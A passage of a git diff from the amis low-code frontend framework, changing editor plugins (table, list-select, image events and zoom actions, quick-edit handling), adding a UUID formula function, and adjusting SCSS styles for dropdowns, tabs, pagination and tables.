'${builderKey}' === '${ - defaultDsType || ApiDSBuilderKey - }' : data.dsType === '${builderKey}')`, - body: flatten([ - builder.makeSourceSettingForm({ - feat: feat.value, - renderer: 'form', - inScaffold: false, - sourceSettings: { - renderLabel: true, - userOrders: false - } - }) - ]) - }) + (builder, builderKey, index) => { + return { + type: 'container', + className: 'form-item-gap', + visibleOn: `$\{feat === '${ + feat.value + }' && (dsType == null ? '${builderKey}' === '${ + defaultDsType || ApiDSBuilderKey + }' : dsType === '${builderKey}')}`, + body: flatten([ + builder.makeSourceSettingForm({ + feat: feat.value, + renderer: 'form', + inScaffold: false, + sourceSettings: { + renderLabel: true, + userOrders: false + } + }) + ]) + }; + } ) ) ); diff --git a/packages/amis-editor/src/plugin/Form/InputTable.tsx b/packages/amis-editor/src/plugin/Form/InputTable.tsx index 5449bf410..4315718b8 100644 --- a/packages/amis-editor/src/plugin/Form/InputTable.tsx +++ b/packages/amis-editor/src/plugin/Form/InputTable.tsx @@ -1071,6 +1071,16 @@ export class TableControlPlugin extends BasePlugin { name: 'affixHeader', label: '是否固定表头', pipeIn: defaultValue(false) + }), + getSchemaTpl('switch', { + name: 'showFooterAddBtn', + label: '展示底部新增按钮', + pipeIn: defaultValue(true) + }), + getSchemaTpl('switch', { + name: 'showTableAddBtn', + label: '展示操作列新增按钮', + pipeIn: defaultValue(true) }) ] }, @@ -1080,6 +1090,10 @@ export class TableControlPlugin extends BasePlugin { getSchemaTpl('className', { name: 'rowClassName', label: '行样式' + }), + getSchemaTpl('className', { + name: 'toolbarClassName', + label: '工具栏' }) ] }) diff --git a/packages/amis-editor/src/plugin/Form/ListSelect.tsx b/packages/amis-editor/src/plugin/Form/ListSelect.tsx index c6574400a..e97724ca8 100644 --- a/packages/amis-editor/src/plugin/Form/ListSelect.tsx +++ b/packages/amis-editor/src/plugin/Form/ListSelect.tsx @@ -109,21 +109,26 @@ export class ListControlPlugin extends BasePlugin { } ]; - subEditorVariable: 
Array<{label: string; children: any}> = [ - { - label: '当前选项', - children: [ - { - label: '选项名称', - value: 'label' - }, - { - label: '选项值', - value: 'value' - } - ] - } - ]; + getSubEditorVariable(schema: any): Array<{label: string; children: any}> { + let labelField = schema?.labelField || 'label'; + let valueField = schema?.valueField || 'value'; + + return [ + { + label: '当前选项', + children: [ + { + label: '选项名称', + value: labelField + }, + { + label: '选项值', + value: valueField + } + ] + } + ]; + } panelBodyCreator = (context: BaseEventContext) => { return formItemControl( @@ -201,7 +206,7 @@ export class ListControlPlugin extends BasePlugin { body: [ { type: 'tpl', - tpl: `\${${this.getDisplayField(value)}}`, + tpl: `\${${this.getDisplayField(data)}}`, wrapperComponent: '', inline: true } @@ -275,16 +280,7 @@ export class ListControlPlugin extends BasePlugin { } getDisplayField(data: any) { - if ( - data.source || - (data.map && - Array.isArray(data.map) && - data.map[0] && - Object.keys(data.map[0]).length > 1) - ) { - return data.labelField ?? 'label'; - } - return 'label'; + return data?.labelField ?? 
'label'; } editDetail(id: string, field: string) { diff --git a/packages/amis-editor/src/plugin/Form/Picker.tsx b/packages/amis-editor/src/plugin/Form/Picker.tsx index 07165aafb..35a00ed65 100644 --- a/packages/amis-editor/src/plugin/Form/Picker.tsx +++ b/packages/amis-editor/src/plugin/Form/Picker.tsx @@ -50,7 +50,7 @@ export class PickerControlPlugin extends BasePlugin { value: 'B' } ], - modalClassName: 'app-popover' + modalClassName: 'app-popover :AMISCSSWrapper' }; previewSchema: any = { type: 'form', diff --git a/packages/amis-editor/src/plugin/Form/Static.tsx b/packages/amis-editor/src/plugin/Form/Static.tsx index d9acbaed6..57b3cf3a3 100644 --- a/packages/amis-editor/src/plugin/Form/Static.tsx +++ b/packages/amis-editor/src/plugin/Form/Static.tsx @@ -1,4 +1,6 @@ import React from 'react'; +import get from 'lodash/get'; +import {getVariable} from 'amis-core'; import {Button} from 'amis'; import { defaultValue, @@ -22,6 +24,15 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ hiddenOnDefault: true, formType: 'extend', pipeIn: (value: any) => !!value, + trueValue: { + mode: 'popOver', + type: 'container', + body: [] + }, + isChecked: (e: any) => { + const {data, name} = e; + return !!get(data, name); + }, form: { body: [ { @@ -67,19 +78,34 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ children: ({value, onChange, data}: any) => { if (value === true) { value = {}; + } else if (typeof value === 'undefined') { + value = getVariable(data, 'quickEdit'); } - - const originMode = value.mode; - - value = { - type: 'input-text', - name: data.name, - ...value - }; - delete value.mode; - + value = {...value}; + const originMode = value.mode || 'popOver'; + if (value.mode) { + delete value.mode; + } + value = + value.body && ['container', 'wrapper'].includes(value.type) + ? 
{ + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; // todo 多个快速编辑表单模式看来只能代码模式编辑了。 - return ( <Button block @@ -88,12 +114,6 @@ setSchemaTpl('quickEdit', (patch: any, manager: any) => ({ manager.openSubEditor({ title: '配置快速编辑类型', value: value, - slot: { - type: 'form', - mode: 'normal', - body: ['$$'], - wrapWithPanel: false - }, onChange: (value: any) => onChange( { diff --git a/packages/amis-editor/src/plugin/Image.tsx b/packages/amis-editor/src/plugin/Image.tsx index 7daef8a26..2815754e5 100644 --- a/packages/amis-editor/src/plugin/Image.tsx +++ b/packages/amis-editor/src/plugin/Image.tsx @@ -1,4 +1,9 @@ -import {getI18nEnabled, registerEditorPlugin} from 'amis-editor-core'; +import { + RendererPluginAction, + RendererPluginEvent, + getI18nEnabled, + registerEditorPlugin +} from 'amis-editor-core'; import { ActiveEventContext, BaseEventContext, @@ -8,6 +13,10 @@ import { } from 'amis-editor-core'; import {defaultValue, getSchemaTpl, tipedLabel} from 'amis-editor-core'; import {mockValue} from 'amis-editor-core'; +import { + getArgsWrapper, + getEventControlConfig +} from '../renderer/event-control/helper'; export class ImagePlugin extends BasePlugin { static id = 'ImagePlugin'; @@ -34,6 +43,112 @@ export class ImagePlugin extends BasePlugin { value: mockValue({type: 'image'}) }; + // 事件定义 + events: RendererPluginEvent[] = [ + { + eventName: 'click', + eventLabel: '点击', + description: '点击时触发', + defaultShow: true, + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + }, + { + eventName: 'mouseenter', + eventLabel: '鼠标移入', + description: '鼠标移入时触发', + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + 
nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + }, + { + eventName: 'mouseleave', + eventLabel: '鼠标移出', + description: '鼠标移出时触发', + dataSchema: [ + { + type: 'object', + properties: { + context: { + type: 'object', + title: '上下文', + properties: { + nativeEvent: { + type: 'object', + title: '鼠标事件对象' + } + } + } + } + } + ] + } + ]; + + // 动作定义 + actions: RendererPluginAction[] = [ + { + actionType: 'preview', + actionLabel: '预览', + description: '预览图片' + }, + { + actionType: 'zoom', + actionLabel: '调整图片比例', + description: '将图片等比例放大或缩小', + schema: { + type: 'container', + body: [ + getArgsWrapper([ + getSchemaTpl('formulaControl', { + name: 'scale', + mode: 'horizontal', + variables: '${variables}', + horizontal: { + leftFixed: 4 // 需要设置下leftFixed,否则这个字段的控件没有与其他字段的控件左对齐 + }, + label: tipedLabel( + '调整比例', + '定义每次放大或缩小图片的百分比大小,正值为放大,负值为缩小,默认50' + ), + value: 50, + size: 'lg' + }) + ]) + ] + } + } + ]; + panelTitle = '图片'; panelJustify = true; panelBodyCreator = (context: BaseEventContext) => { @@ -63,7 +178,7 @@ export class ImagePlugin extends BasePlugin { pipeIn: defaultValue('thumb'), options: [ { - label: '缩率图', + label: '缩略图', value: 'thumb' }, { @@ -130,6 +245,24 @@ export class ImagePlugin extends BasePlugin { getSchemaTpl('imageUrl', { name: 'defaultImage', label: tipedLabel('占位图', '无数据时显示的图片') + }), + getSchemaTpl('formulaControl', { + name: 'maxScale', + mode: 'horizontal', + label: tipedLabel( + '放大极限', + '定义动作调整图片大小的最大百分比,默认200' + ), + value: 200 + }), + getSchemaTpl('formulaControl', { + name: 'minScale', + mode: 'horizontal', + label: tipedLabel( + '缩小极限', + '定义动作调整图片大小的最小百分比,默认50' + ), + value: 50 }) ] }, @@ -245,6 +378,16 @@ export class ImagePlugin extends BasePlugin { }, getSchemaTpl('theme:cssCode') ]) + }, + { + title: '事件', + className: 'p-none', + body: [ + getSchemaTpl('eventControl', { + name: 'onEvent', + ...getEventControlConfig(this.manager, context) + }) + ] } ]); }; diff --git 
a/packages/amis-editor/src/plugin/Images.tsx b/packages/amis-editor/src/plugin/Images.tsx index 1e0349b91..fc3da2d7f 100644 --- a/packages/amis-editor/src/plugin/Images.tsx +++ b/packages/amis-editor/src/plugin/Images.tsx @@ -20,7 +20,7 @@ export class ImagesPlugin extends BasePlugin { pluginIcon = 'images-plugin'; scaffold = { type: 'images', - imageGallaryClassName: 'app-popover' + imageGallaryClassName: 'app-popover :AMISCSSWrapper' }; previewSchema = { ...this.scaffold, diff --git a/packages/amis-editor/src/plugin/Nav.tsx b/packages/amis-editor/src/plugin/Nav.tsx index 0b68a7582..6157c9c14 100644 --- a/packages/amis-editor/src/plugin/Nav.tsx +++ b/packages/amis-editor/src/plugin/Nav.tsx @@ -29,6 +29,7 @@ export class NavPlugin extends BasePlugin { scaffold = { type: 'nav', stacked: true, + popupClassName: 'app-popover :AMISCSSWrapper', links: [ { label: '页面1', diff --git a/packages/amis-editor/src/plugin/Others/TableCell.tsx b/packages/amis-editor/src/plugin/Others/TableCell.tsx index a69c71b69..7949d8574 100644 --- a/packages/amis-editor/src/plugin/Others/TableCell.tsx +++ b/packages/amis-editor/src/plugin/Others/TableCell.tsx @@ -1,5 +1,6 @@ import {Button} from 'amis'; import React from 'react'; +import get from 'lodash/get'; import {getI18nEnabled, registerEditorPlugin} from 'amis-editor-core'; import { BasePlugin, @@ -69,6 +70,10 @@ export class TableCellPlugin extends BasePlugin { getSchemaTpl('switch', { name: 'quickEdit', label: '启用快速编辑', + isChecked: (e: any) => { + const {data, name} = e; + return !!get(data, name); + }, pipeIn: (value: any) => !!value }), @@ -120,18 +125,32 @@ export class TableCellPlugin extends BasePlugin { } else if (typeof value === 'undefined') { value = getVariable(data, 'quickEdit'); } - - const originMode = value.mode; - - value = { - type: 'input-text', - name: data.name, - ...value - }; - delete value.mode; + value = {...value}; + const originMode = value.mode || 'popOver'; + if (value.mode) { + delete value.mode; + } + 
value = + value.body && ['container', 'wrapper'].includes(value.type) + ? { + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; // todo 多个快速编辑表单模式看来只能代码模式编辑了。 - return ( <Button level="info" @@ -142,12 +161,6 @@ export class TableCellPlugin extends BasePlugin { this.manager.openSubEditor({ title: '配置快速编辑类型', value: value, - slot: { - type: 'form', - mode: 'normal', - body: ['$$'], - wrapWithPanel: false - }, onChange: value => onChange( { diff --git a/packages/amis-editor/src/plugin/SwitchContainer.tsx b/packages/amis-editor/src/plugin/SwitchContainer.tsx index 05dd08adc..1852a11f4 100644 --- a/packages/amis-editor/src/plugin/SwitchContainer.tsx +++ b/packages/amis-editor/src/plugin/SwitchContainer.tsx @@ -321,6 +321,7 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { name: 'items', label: '状态列表', addTip: '新增组件状态', + minLength: 1, items: [ { type: 'input-text', @@ -356,6 +357,10 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { title: '外观', className: 'p-none', body: getSchemaTpl('collapseGroup', [ + getSchemaTpl('theme:base', { + collapsed: false, + extra: [] + }), { title: '布局', body: [ @@ -460,7 +465,15 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { getSchemaTpl('layout:stickyPosition') ] }, - ...getSchemaTpl('theme:common', {exclude: ['layout']}) + { + title: '自定义样式', + body: [ + { + type: 'theme-cssCode', + label: false + } + ] + } ]) }, { diff --git a/packages/amis-editor/src/plugin/TableCell2.tsx b/packages/amis-editor/src/plugin/TableCell2.tsx index 01b643e2f..dc905a1c0 100644 --- a/packages/amis-editor/src/plugin/TableCell2.tsx +++ b/packages/amis-editor/src/plugin/TableCell2.tsx @@ -431,17 +431,14 @@ export class TableCell2Plugin extends BasePlugin { mode: 'normal', formType: 'extend', bulk: true, - defaultData: { - quickEdit: { - mode: 'popOver' - } - 
}, trueValue: { - mode: 'popOver' + mode: 'popOver', + type: 'container', + body: [] }, isChecked: (e: any) => { const {data, name} = e; - return get(data, name); + return !!get(data, name); }, form: { body: [ @@ -489,27 +486,31 @@ export class TableCell2Plugin extends BasePlugin { } else if (typeof value === 'undefined') { value = getVariable(data, 'quickEdit'); } - - const originMode = value?.mode || 'popOver'; - - value = { - ...value, - type: 'form', - mode: 'normal', - wrapWithPanel: false, - body: value?.body?.length - ? value.body - : [ - { - type: 'input-text', - name: data.key - } - ] - }; - + value = {...value}; + const originMode = value.mode || 'popOver'; if (value.mode) { delete value.mode; } + value = + value.body && ['container', 'wrapper'].includes(value.type) + ? { + // schema中存在容器,用自己的就行 + type: 'container', + body: [], + ...value + } + : { + // schema中不存在容器,打开子编辑器时需要包裹一层 + type: 'container', + body: [ + { + type: 'input-text', + name: data.name, + ...value + } + ] + }; + // todo 多个快速编辑表单模式看来只能代码模式编辑了。 return ( <Button diff --git a/packages/amis-editor/src/renderer/ListItemControl.tsx b/packages/amis-editor/src/renderer/ListItemControl.tsx index 4754bf48c..26117f8bf 100644 --- a/packages/amis-editor/src/renderer/ListItemControl.tsx +++ b/packages/amis-editor/src/renderer/ListItemControl.tsx @@ -7,7 +7,7 @@ import {findDOMNode} from 'react-dom'; import cx from 'classnames'; import get from 'lodash/get'; import Sortable from 'sortablejs'; -import {FormItem, Button, Icon, render as amisRender} from 'amis'; +import {FormItem, Button, Icon, render as amisRender, toast} from 'amis'; import {autobind} from 'amis-editor-core'; import type {Option} from 'amis'; import {createObject, FormControlProps} from 'amis-core'; @@ -30,7 +30,6 @@ export type SourceType = 'custom' | 'api' | 'apicenter' | 'variable'; export interface OptionControlState { items: Array<PlainObject>; - api: SchemaApi; labelField: string; valueField: string; } @@ -50,7 +49,6 @@ export 
default class ListItemControl extends React.Component< this.state = { items: this.transformOptions(props), - api: props.data.source, labelField: props.data.labelField || 'title', valueField: props.data.valueField }; @@ -173,6 +171,12 @@ export default class ListItemControl extends React.Component< */ handleDelete(index: number) { const items = this.state.items.concat(); + const minLength = this.props.minLength; + + if (minLength > 0 && items.length <= minLength) { + toast.warning(`列表项数目不能少于${minLength}`); + return; + } items.splice(index, 1); this.setState({items}, () => this.onChange()); diff --git a/packages/amis-editor/src/renderer/event-control/helper.tsx b/packages/amis-editor/src/renderer/event-control/helper.tsx index 36fd16ef4..57aaceda7 100644 --- a/packages/amis-editor/src/renderer/event-control/helper.tsx +++ b/packages/amis-editor/src/renderer/event-control/helper.tsx @@ -1244,8 +1244,6 @@ export const ACTION_TYPE_TREE = (manager: any): RendererPluginAction[] => { 'path', 'value', 'index', - 'fromPage', - 'fromApp', '__valueInput', '__comboType', '__containerType' @@ -1283,29 +1281,34 @@ export const ACTION_TYPE_TREE = (manager: any): RendererPluginAction[] => { supportComponents: 'byComponent', schema: [ { - name: '__actionSubType', - type: 'radios', - label: '动作类型', - mode: 'horizontal', - options: [ - {label: '组件变量', value: 'cmpt'}, - {label: '页面变量', value: 'page'}, - {label: '内存变量', value: 'app'} - ], - value: - '${args.fromApp ? "app" : args.fromPage ? 
"page" : "cmpt"}', - onChange: (value: string, oldVal: any, data: any, form: any) => { - form.setValueByName('__valueInput', undefined); - form.setValueByName('args.value', undefined); - form.deleteValueByName('args.path'); - form.deleteValueByName('args.fromApp'); - form.deleteValueByName('args.fromPage'); - - if (value === 'page') { - form.setValueByName('args.fromPage', true); - } else if (value === 'app') { - form.setValueByName('args.fromApp', true); - } + children: ({render, data}: any) => { + const path = data?.args?.path || ''; + return render('setValueType', { + name: '__actionSubType', + type: 'radios', + label: '动作类型', + mode: 'horizontal', + options: [ + {label: '组件变量', value: 'cmpt'}, + {label: '页面变量', value: 'page'}, + {label: '内存变量', value: 'app'} + ], + value: /^appVariables/.test(path) // 只需要初始化时更新value + ? 'app' + : /^(__page|__query)/.test(path) + ? 'page' + : 'cmpt', + onChange: ( + value: string, + oldVal: any, + data: any, + form: any + ) => { + form.setValueByName('__valueInput', undefined); + form.setValueByName('args.value', undefined); + form.deleteValueByName('args.path'); + } + }); } }, // 组件变量 @@ -2349,6 +2352,12 @@ export const COMMON_ACTION_SCHEMA_MAP: { }, confirm: { descDetail: (info: any) => <div>打开确认对话框</div> + }, + preview: { + descDetail: (info: any) => <div>预览图片</div> + }, + zoom: { + descDetail: (info: any) => <div>调整图片比例</div> } }; @@ -3212,7 +3221,7 @@ export const getEventControlConfig = ( showCloseButton: true, showErrorMsg: true, showLoading: true, - className: 'app-popover', + className: 'app-popover :AMISCSSWrapper', actions: [ { type: 'button', @@ -3239,7 +3248,7 @@ export const getEventControlConfig = ( inline: false } ], - className: 'app-popover', + className: 'app-popover :AMISCSSWrapper', actions: [ { type: 'button', @@ -3376,9 +3385,7 @@ export const getEventControlConfig = ( /** 应用变量赋值 */ action.args = { path: config.args.path, - value: config.args?.value ?? 
'', - fromPage: action.args?.fromPage, - fromApp: action.args?.fromApp + value: config.args?.value ?? '' }; action.hasOwnProperty('componentId') && delete action.componentId; diff --git a/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx b/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx index d4c7d254e..67fdd15ea 100644 --- a/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx +++ b/packages/amis-editor/src/renderer/textarea-formula/TextareaFormulaControl.tsx @@ -148,7 +148,7 @@ export class TextareaFormulaControl extends React.Component< constructor(props: TextareaFormulaControlProps) { super(props); this.state = { - value: '', + value: this.props.value || '', variables: [], formulaPickerOpen: false, formulaPickerValue: '', diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..db1d8658d 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return 
text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * @example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 36) { + const len = Math.min(Math.max(length, 0), 36); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +} diff --git a/packages/amis-ui/scss/_components.scss b/packages/amis-ui/scss/_components.scss index 8bbe78d56..74e9b563a 100644 --- a/packages/amis-ui/scss/_components.scss +++ b/packages/amis-ui/scss/_components.scss @@ -786,6 +786,7 @@ --transfer-base-header-paddingBottom: var(--sizes-size-5); --transfer-base-header-paddingLeft: var(--sizes-size-8); --transfer-base-header-paddingRight: var(--sizes-size-8); + --transfer-base-footer-border-color: var(--colors-neutral-line-8); --transfer-base-body-paddingTop: var(--sizes-size-0); --transfer-base-body-paddingBottom: var(--sizes-size-0); --transfer-base-body-paddingLeft: var(--sizes-size-0); @@ -2052,6 +2053,7 @@ --Tabs-onActive-bg: var(--background); --Tabs-onActive-borderColor: var(--borderColor); --Tabs-onActive-color: var(--colors-neutral-text-2); + --Tabs-onError-color: var(--colors-error-5); --Tabs-onDisabled-color: var(--colors-neutral-text-7); --Tabs-onHover-borderColor: var(--colors-neutral-line-8); --Tabs-add-icon-size: #{px2rem(15px)}; @@ -4130,6 +4132,7 @@ var(--combo-vertical-right-border-color) var(--combo-vertical-bottom-border-color) var(--combo-vertical-left-border-color); + --Combo--vertical-item--onError-borderColor: var(--colors-error-5); 
--Combo--vertical-item-borderRadius: var( --combo-vertical-top-left-border-radius ) diff --git a/packages/amis-ui/scss/_properties.scss b/packages/amis-ui/scss/_properties.scss index 19aec048c..466457909 100644 --- a/packages/amis-ui/scss/_properties.scss +++ b/packages/amis-ui/scss/_properties.scss @@ -274,22 +274,18 @@ $Table-strip-bg: transparent; --DropDown-menu-borderColor: var(--borderColor); --DropDown-menu-borderRadius: var(--borderRadius); --DropDown-menu-borderWidth: var(--borderWidth); - --DropDown-menu-boxShadow: var(--shadows-shadow-normal); - --DropDown-menu-height: #{px2rem(34px)}; + --DropDown-menu-boxShadow: var(--Form-select-outer-boxShadow); + --DropDown-menu-height: #{px2rem(32px)}; --DropDown-menu-minWidth: #{px2rem(160px)}; --DropDown-menu-paddingX: 0; --DropDown-menu-paddingY: var(--gap-xs); - --DropDown-menuItem-onHover-bg: var(--ListMenu-item--onHover-bg); + --DropDown-menuItem-onHover-bg: var(--Form-select-menu-onHover-bg); --DropDown-group-color: #848b99; --DropDown-menuItem-color: #151a26; - --DropDown-menuItem-onHover-color: var(--colors-brand-5); + --DropDown-menuItem-onHover-color: var(--Form-select-menu-onHover-color); --DropDown-menuItem-onActive-color: var(--colors-brand-5); --DropDown-menuItem-onDisabled-color: #b4b6ba; - --DropDown-menuItem-paddingX: var(--gap-sm); - --DropDown-menuItem-paddingY: calc( - (var(--DropDown-menu-height) - var(--fontSizeBase) * var(--lineHeightBase)) / - 2 - ); + --DropDown-menuItem-paddingX: var(--select-base-default-option-paddingRight); --Fieldset-legend-bgColor: var(--colors-neutral-fill-11); diff --git a/packages/amis-ui/scss/components/_dropdown.scss b/packages/amis-ui/scss/components/_dropdown.scss index fd2eaad31..b1665b58f 100644 --- a/packages/amis-ui/scss/components/_dropdown.scss +++ b/packages/amis-ui/scss/components/_dropdown.scss @@ -57,6 +57,7 @@ overflow-y: auto; overflow-x: hidden; max-height: px2rem(300px); + margin-top: px2rem(4px); } } @@ -67,10 +68,11 @@ &-menuItem, &-menu > li { 
- padding: var(--DropDown-menuItem-paddingY) var(--DropDown-menuItem-paddingX); + padding: 0 var(--DropDown-menuItem-paddingX); white-space: nowrap; box-sizing: border-box; height: var(--DropDown-menu-height); + line-height: var(--DropDown-menu-height); vertical-align: middle; user-select: none; color: var(--DropDown-menuItem-color); @@ -95,7 +97,7 @@ &.#{$ns}DropDown-divider { height: px2rem(1px); - margin: px2rem(9px) 0; + margin: px2rem(4px) 0; overflow: hidden; background: var(--DropDown-menu-borderColor); padding: 0; diff --git a/packages/amis-ui/scss/components/_menu.scss b/packages/amis-ui/scss/components/_menu.scss index de0134152..ef1c19979 100644 --- a/packages/amis-ui/scss/components/_menu.scss +++ b/packages/amis-ui/scss/components/_menu.scss @@ -519,14 +519,13 @@ .#{$ns}Nav-Menu-submenu-arrow { display: inline-block; font-size: px2rem(9px); - vertical-align: middle; text-transform: none; text-rendering: auto; line-height: px2rem(20px); margin-left: px2rem(5px); & > svg { - top: auto; + top: 0; } } diff --git a/packages/amis-ui/scss/components/_pagination.scss b/packages/amis-ui/scss/components/_pagination.scss index 72f7a8219..f54d27bb8 100644 --- a/packages/amis-ui/scss/components/_pagination.scss +++ b/packages/amis-ui/scss/components/_pagination.scss @@ -74,7 +74,7 @@ } } &-simple { - >ul >li { + > ul > li { &:hover, &:focus { outline: none; @@ -94,8 +94,6 @@ } } - - &-next { > span { cursor: pointer; @@ -113,47 +111,47 @@ align-items: center; height: var(--Pagination-height); - &-left { - color: var(--Pagination-light-color); - } - input { - min-width: px2rem(50px); - width: px2rem(50px); - height: var(--Pagination-height); - line-height: var(--Pagination-height); - // height: var(--Pagination-height); - border: none; - border: var(--borderWidth) solid var(--borderColor); - border-radius: var(--borderRadius) 0 0 var(--borderRadius); - padding: var(--Pagination-padding); - margin-left: px2rem(8px); - text-align: center; - - &:focus, - &:hover { - 
outline: none; - // border: var(--borderWidth) solid var(--primary); - border-color: var(--primary); - } + &-left { + color: var(--Pagination-light-color); + } + input { + min-width: px2rem(50px); + width: px2rem(50px); + height: var(--Pagination-height); + line-height: var(--Pagination-height); + // height: var(--Pagination-height); + border: none; + border: var(--borderWidth) solid var(--borderColor); + border-radius: var(--borderRadius) 0 0 var(--borderRadius); + padding: var(--Pagination-padding); + margin-left: px2rem(8px); + text-align: center; + + &:focus, + &:hover { + outline: none; + // border: var(--borderWidth) solid var(--primary); + border-color: var(--primary); } - &-right { - display: inline-block; - width: px2rem(32px); - cursor: pointer; - text-align: center; - height: var(--Pagination-height); - line-height: var(--Pagination-height); - border: var(--borderWidth) solid var(--borderColor); - border-left: none; - border-radius: 0 var(--borderRadius) var(--borderRadius) 0; - font-size: var(--fontSizeSm); - &:hover { - color: var(--primary); - border-color: var(--primary); - border-left: var(--borderWidth) solid var(--primary); - margin-left: -1px; - } + } + &-right { + display: inline-block; + width: px2rem(32px); + cursor: pointer; + text-align: center; + height: var(--Pagination-height); + line-height: var(--Pagination-height); + border: var(--borderWidth) solid var(--borderColor); + border-left: none; + border-radius: 0 var(--borderRadius) var(--borderRadius) 0; + font-size: var(--fontSizeSm); + &:hover { + color: var(--primary); + border-color: var(--primary); + border-left: var(--borderWidth) solid var(--primary); + margin-left: -1px; } + } } } @@ -161,7 +159,6 @@ line-height: px2rem(30px); .#{$ns}Pagination-item { - margin-left: px2rem(8px); &:nth-child(1) { margin-left: 0; } @@ -198,4 +195,4 @@ } text-align: right; -} \ No newline at end of file +} diff --git a/packages/amis-ui/scss/components/_table.scss 
b/packages/amis-ui/scss/components/_table.scss index d93fd7ab9..8ec35a319 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -1108,3 +1108,13 @@ } } } + +.#{$ns}AutoFilterToolbar { + display: block; + text-align: right; + white-space: nowrap; + + > .#{$ns}Button { + margin-top: 0; + } +} diff --git a/packages/amis-ui/scss/components/_tabs.scss b/packages/amis-ui/scss/components/_tabs.scss index 04e4f29ee..3f3e12914 100644 --- a/packages/amis-ui/scss/components/_tabs.scss +++ b/packages/amis-ui/scss/components/_tabs.scss @@ -18,10 +18,10 @@ .#{$ns}Tabs-addable { display: flex; - margin-left: var(--Tabs-add-margin); align-items: center; - justify-content: flex-start; - padding: var(--Tabs--line-addPadding); + margin-left: var(--Tabs-add-margin); + margin-bottom: px2rem(3px); + padding-bottom: px2rem(8px); white-space: nowrap; cursor: pointer; @@ -60,16 +60,19 @@ // } &-arrow { - margin: var(--Tabs--line-addPadding); width: 16px; height: 100%; display: flex; align-items: center; cursor: pointer; box-sizing: content-box; + margin-bottom: px2rem(3px); + padding-bottom: px2rem(8px); - .iconfont { - font-size: var(--Remark-icon-fontSize); + .icon { + top: 0; + width: var(--Remark-icon-fontSize); + height: var(--Remark-icon-fontSize); } &:hover { color: var(--icon-onHover-color); @@ -77,6 +80,9 @@ &--left { padding-right: 16px; + svg { + transform: rotate(180deg); + } } &--right { @@ -242,6 +248,10 @@ border-color: var(--Tabs-onActive-borderColor); border-bottom-color: transparent; } + + &.has-error > a:first-child { + color: var(--Tabs-onError-color) !important; + } } } @@ -672,6 +682,7 @@ .#{$ns}Tabs-addable { padding: 0 var(--Tabs--tiled-add-gap); margin-left: 0; + margin-bottom: 0; white-space: nowrap; border-style: solid; border-color: var(--Tabs-borderColor); @@ -1112,6 +1123,7 @@ & > .#{$ns}Tabs-linksContainer { > .#{$ns}Tabs-linksContainer-arrow { margin-bottom: 0; + padding: 0; } > 
